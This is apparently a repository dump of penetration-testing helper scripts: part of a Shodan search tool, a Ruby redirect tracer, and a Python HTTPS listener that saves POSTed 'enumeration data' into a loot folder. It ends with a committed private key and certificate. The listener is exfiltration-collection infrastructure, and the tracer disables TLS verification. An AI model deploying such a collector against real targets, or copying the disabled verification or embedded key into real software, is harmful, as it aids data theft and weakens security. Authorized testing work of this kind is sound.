| search_page_number, search_file = cli_parser() 262 | 263 | # Create object used to search Shodan 264 | shodan_api_object = create_shodan_object() 265 | 266 | # Determine which action will be performed 267 | if search_string is not False: 268 | shodan_string_search(shodan_api_object, search_string, 269 | search_hostnameonly, search_page_number) 270 | 271 | elif search_ip is not False: 272 | shodan_ip_search(shodan_api_object, search_ip) 273 | 274 | elif search_cidr is not False or search_file is not None: 275 | shodan_cidr_search(shodan_api_object, search_cidr, search_file) 276 | 277 | else: 278 | print "You didn't provide a valid option!" 279 | -------------------------------------------------------------------------------- /WebScripts/WebTrace.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'net/http' 4 | require 'net/https' 5 | require 'uri' 6 | 7 | # The fetch function was based off of the function at the following URL 8 | # http://stackoverflow.com/questions/6934185/ruby-net-http-following-redirects 9 | 10 | # This will only follow 302 redirects currently 11 | # This script came to fruition after @digininja requesting this feature be added to EyeWitness 12 | # Thanks to @digininja for the suggestion and great idea. This has been added in to EyeWitness too. 13 | 14 | def fetch(uri_str, url_list, limit = 10) 15 | # This checks up to 10 redirects. If it keeps going further, change the limit value 16 | raise ArgumentError, 'HTTP redirect too deep' if limit == 0 17 | 18 | uri = URI.parse(uri_str) 19 | 20 | if uri_str.start_with?("http://") 21 | # code came from - http://www.rubyinside.com/nethttp-cheat-sheet-2940.html 22 | http = Net::HTTP.new(uri.host, uri.port) 23 | request = Net::HTTP::Get.new(uri.request_uri) 24 | elsif uri_str.start_with?("https://") 25 | http = Net::HTTP.new(uri.host, uri.port) 26 | http.use_ssl = true 27 | http.verify_mode = OpenSSL::SSL::VERIFY_NONE 28 | request = Net::HTTP::Get.new(uri.request_uri) 29 | end 30 | 31 | response = http.request(request) 32 | case response 33 | when Net::HTTPSuccess 34 | url_list.push("#{uri_str} <- Final URL") 35 | when Net::HTTPRedirection 36 | url_list.push("#{uri_str} redirects to...") 37 | uri = URI.parse(uri_str) 38 | base_url = "#{uri.scheme}://#{uri.host}" 39 | new_url = URI.parse(response.header['location']) 40 | if (new_url.relative?) 41 | new_url = base_url + response.header['location'] 42 | fetch(new_url, url_list, limit - 1) 43 | else 44 | fetch(response['location'], url_list, limit - 1) 45 | end 46 | else 47 | response.error! 48 | end 49 | end 50 | 51 | # Check to make sure we have only one argument, the URL 52 | if ARGV.length != 1 53 | puts "[*] Error: Please provide a URL to check for redirects!" 54 | puts "[*] Usage: ./WebTrace.rb " 55 | exit 56 | end 57 | 58 | # Check to make sure it's a valid URL 59 | if ARGV[0] =~ URI::regexp 60 | else 61 | puts "[*] Error: Please provide a valid URL!" 62 | puts "[*] Usage: ./WebTrace.rb " 63 | exit 64 | end 65 | 66 | # Array which will store all redirects 67 | all_urls = [] 68 | 69 | # Function that checks for redirects 70 | fetch(ARGV[0], all_urls) 71 | 72 | # If no redirects, say so. Otherwise, list all redirects 73 | if all_urls.length == 1 74 | puts "No Redirection" 75 | else 76 | all_urls.each do |ind_url| 77 | puts ind_url 78 | end 79 | end 80 | -------------------------------------------------------------------------------- /WebScripts/enum_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import os 4 | import socket 5 | import ssl 6 | import sys 7 | import time 8 | from BaseHTTPServer import BaseHTTPRequestHandler 9 | from BaseHTTPServer import HTTPServer 10 | from SocketServer import ThreadingMixIn 11 | from threading import Thread 12 | 13 | 14 | class GetHandler(BaseHTTPRequestHandler): 15 | # Some of the http server code came from Dave Kennedy's AES shell 16 | # over http - the server specific code 17 | 18 | # should be performing GET requests Help from 19 | # http://pymotw.com/2/BaseHTTPServer/ 20 | def do_GET(self): 21 | print "Someone is trying to make a GET request to this server..." 22 | # 404 since we aren't serving up any pages, only receiving data 23 | self.send_response(404) 24 | self.end_headers() 25 | return 26 | 27 | # handle post request 28 | def do_POST(self): 29 | 30 | # current directory 31 | exfil_directory = os.path.join(os.getcwd(), "data") 32 | loot_path = exfil_directory + "/" 33 | 34 | # Info for this from - 35 | # http://stackoverflow.com/questions/13146064/simple- 36 | # python-webserver-to-save-file 37 | if self.path == "/post_enum_data.php": 38 | 39 | self.send_response(200) 40 | self.end_headers() 41 | 42 | # Check to make sure the agent directory exists, and a loot 43 | # directory for the agent. If not, make them 44 | if not os.path.isdir(loot_path): 45 | os.makedirs(loot_path) 46 | 47 | # Get the date info 48 | current_date = time.strftime("%m/%d/%Y") 49 | current_time = time.strftime("%H:%M:%S") 50 | screenshot_name = current_date.replace("/", "") +\ 51 | "_" + current_time.replace(":", "") + "enumeration_data.txt" 52 | 53 | # Read the length of the screenshot file being uploaded 54 | screen_length = self.headers['content-length'] 55 | screen_data = self.rfile.read(int(screen_length)) 56 | 57 | # Write out the file 58 | with open(loot_path + screenshot_name, 'a') as cc_data_file: 59 | cc_data_file.write(screen_data) 60 | 61 | # All other Post requests 62 | else: 63 | 64 | self.send_response(404) 65 | self.end_headers() 66 | 67 | print "Odd... someone else is trying to access this web server..." 68 | print "Might want to check that out..." 69 | return 70 | 71 | 72 | class ThreadingHTTPServer(ThreadingMixIn, HTTPServer): 73 | pass 74 | 75 | 76 | def serve_on_port(): 77 | try: 78 | cert_path = os.path.dirname(os.path.realpath(__file__)) +\ 79 | '/web/server.pem' 80 | server = ThreadingHTTPServer( 81 | ("0.0.0.0", 443), GetHandler) 82 | server.socket = ssl.wrap_socket( 83 | server.socket, certfile=cert_path, server_side=True) 84 | server.serve_forever() 85 | except socket.error: 86 | print "[*][*] Error: Port %d is currently in use!" % port 87 | print "[*][*] Error: Please restart when port is free!\n" 88 | sys.exit() 89 | return 90 | 91 | 92 | try: 93 | print "[*] Starting web (https) server..." 94 | # bind to all interfaces 95 | Thread(target=serve_on_port).start() 96 | print "[*] Web server is currently running" 97 | print "[*] Type \"kill -9 " + str(os.getpid()) + "\" to stop the web server." 98 | # handle keyboard interrupts 99 | except KeyboardInterrupt: 100 | print "[!] Rage quiting, and stopping the web server!" 101 | -------------------------------------------------------------------------------- /WebScripts/web/server.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDCwrE5UD+myTPe 3 | ogF3/NYu2i29XMik6/Bs7lYrgDo0kNzZjALkUqt8KZz/s7Z32zmZvqjxadtbwktv 4 | 3yTvvEm/9fhIMLYEXeZCyPYFCMyW04fB6n5fyOtd6JaHTJFdiB4LGgleX1rniQ0X 5 | eUM0oR4Y+ToPF1oUgPvAPLCffeednTJWW38S642Igdv31dMnm8lDNoFtkSnGEPyA 6 | WfoEfT5xO/4Osorch3gh1wLOcWLdRixa98ZU4c7ZmFLj1nN6tIY1/fbJSCS/UHkF 7 | 0OOBzuJib3sGksO0X7KH8GqWja+sVCE3BUWbrhR0n0zEjJWvIfUKtg+wMCfDPXSH 8 | EbQml1PBAgMBAAECggEActBpv9riG0Xj0Sx6Zyzjay1t54NKOYdp7h23KN/n8FMy 9 | DwGuNsHRnFm/1zIvsIrJcyxl1iPMkFSDOkk3Miky5PpxSsWEmCBu/RIRjrg4O/Yp 10 | wxSlOXxt3KegDdUCoTv8UhkgSsU2BubRk/QFvYH6B0jthDYFAa9kOljM2slTgKNC 11 | 4Y1zJx/0ej3P74G337v8ehvFS+xvc+DG1vSgHaEmKQfENSEwkOFzJWy2FFFLkul6 12 | a8cG2+aLbRKP3mydABxRRhaOI0nn81QmUt4lJMGLVgmNIOG5kNRgBg/rmbswlEeq 13 | uqxdTI5wRjnWncmc5RyvNSMhSyx5fNq95KRIXamiLQKBgQDg9WmwI/DDO8R3RlZG 14 | ALEF7YbWFO23yEm+aORnfgjKfOaqazwMoyYu+X5OxfC8lZNfrATf7p93fcCWRmm8 15 | xzTE7MxPi0LcgWMrfsVZ39smR11QMqHjgp4jq23feHk1SduquG76eKKWgLckJdnp 16 | jgrLW3mEgixX30FlzCm/Qz023wKBgQDdoop522Ri++tN9QAzlyawL0J89XXlFbrt 17 | LN8tznqhP9agjh/Hcuobt26KItbAAFQEcnS/boafB4TTFz/OQJEjsAuw1oHU618b 18 | 0y0Q0b3gifWzTZqglHjsbQTvM17/++ImPJjTKjq1+OAujzReEZ1aUkbHNdk3CzP7 19 | z1wXrPHpXwKBgQCzoqUTt49xh096Y1tPKQwzDJqIZ0vwXuqsNvx0vArvDs/vNBRO 20 | jxVVm3tGEgALx3FYi3eVDeqfM3bPSUj0KyqzOdhoiG8Kv/Nd7yxOeVh5d7FG8jee 21 | AlafaywgsAYyDFlyOTa9oglLH1ufbO5W90sdWl1t97jLLob9cAvCJEJEhwKBgCdw 22 | Ww/gGHb8uRyAMm77wKitYDl4PGhte3vk9jniejPjdj/PypvlOP+Bnqv6ExjLdifs 23 | bhX6hv4Zims9wd7j4m/lTc9D/Ip079G1vFk32X/xTMWBU7ircvEvXSdrjsYiflWr 24 | hs5cv2HOTaY7WWg73jJKXcnpLSP8XF28wnh8D/glAoGBAJQFEH0xKEtdeEX0Sh6e 25 | Y96Kea3nQvjV3qK7mr6JhR/b/UzOJcQsQOGcmad46CvZXXCy7gLuKzN6X56x2bhF 26 | f2oiRBZN7ZWAvAg8eFvFI7eaNA3GVsp9NDCx/ONuVNHYqR9jYPMfp+8dMm8c5AxR 27 | vFn/gCI5kFRoRqYcPgfwIHOp 28 | -----END PRIVATE KEY----- 29 | -----BEGIN CERTIFICATE----- 30 | MIIEHzCCAwegAwIBAgIJALEp+z0jP13qMA0GCSqGSIb3DQEBCwUAMIGlMQswCQYD 31 | VQQGEwJVUzERMA8GA1UECAwIVmlyZ2luaWExEDAOBgNVBAcMB0ZhaXJmYXgxGDAW 32 | BgNVBAoMD1Rlc3QgRW51bWVyYXRvcjEMMAoGA1UECwwDd2ViMR8wHQYDVQQDDBYq 33 | LmVudW1lcmF0aW9uLXRlc3QuY29tMSgwJgYJKoZIhvcNAQkBFhlhZG1pbkBlbnVt 34 | ZXJhdGlvbnRlc3QuY29tMB4XDTE2MDUwMjIwMjgxNloXDTE3MDUwMjIwMjgxNlow 35 | gaUxCzAJBgNVBAYTAlVTMREwDwYDVQQIDAhWaXJnaW5pYTEQMA4GA1UEBwwHRmFp 36 | cmZheDEYMBYGA1UECgwPVGVzdCBFbnVtZXJhdG9yMQwwCgYDVQQLDAN3ZWIxHzAd 37 | BgNVBAMMFiouZW51bWVyYXRpb24tdGVzdC5jb20xKDAmBgkqhkiG9w0BCQEWGWFk 38 | bWluQGVudW1lcmF0aW9udGVzdC5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAw 39 | ggEKAoIBAQDCwrE5UD+myTPeogF3/NYu2i29XMik6/Bs7lYrgDo0kNzZjALkUqt8 40 | KZz/s7Z32zmZvqjxadtbwktv3yTvvEm/9fhIMLYEXeZCyPYFCMyW04fB6n5fyOtd 41 | 6JaHTJFdiB4LGgleX1rniQ0XeUM0oR4Y+ToPF1oUgPvAPLCffeednTJWW38S642I 42 | gdv31dMnm8lDNoFtkSnGEPyAWfoEfT5xO/4Osorch3gh1wLOcWLdRixa98ZU4c7Z 43 | mFLj1nN6tIY1/fbJSCS/UHkF0OOBzuJib3sGksO0X7KH8GqWja+sVCE3BUWbrhR0 44 | n0zEjJWvIfUKtg+wMCfDPXSHEbQml1PBAgMBAAGjUDBOMB0GA1UdDgQWBBSB82qn 45 | R1q07QsTtv12RUWsMiKdRTAfBgNVHSMEGDAWgBSB82qnR1q07QsTtv12RUWsMiKd 46 | RTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBFhaFkplKGS4aVJXny 47 | s5a2e5zw70/N0KXKAFB0SyxqnmmaLmsu0/j7VZRITuAJwtU54YzyekqcM6Ba+vqz 48 | l6Yg1U8mM68H6vrSVCyLkIQB/s4Rka3NvjfLHRm6WQ/EfrpzUKEq5zh+MjKREaww 49 | sUhetd4uMP81Hx/+IOSNpjyFp8WZlrYKPGu822GhaW+e76ERV7m6YN/65URD3Zow 50 | glva2R8CC8kzno0ft/Z6NUPtf0tLJ7lcntJZQwRZKIuSfvRjHXVpnkA5hc930ktH 51 | xT6KuTTrN61oLP9LqB9IKqZAt/JwTntXqHJWOJc0IFy/Hu8il62ANaNQ4RSeypvK 52 | LCP+ 53 | -----END CERTIFICATE----- 54 | --------------------------------------------------------------------------------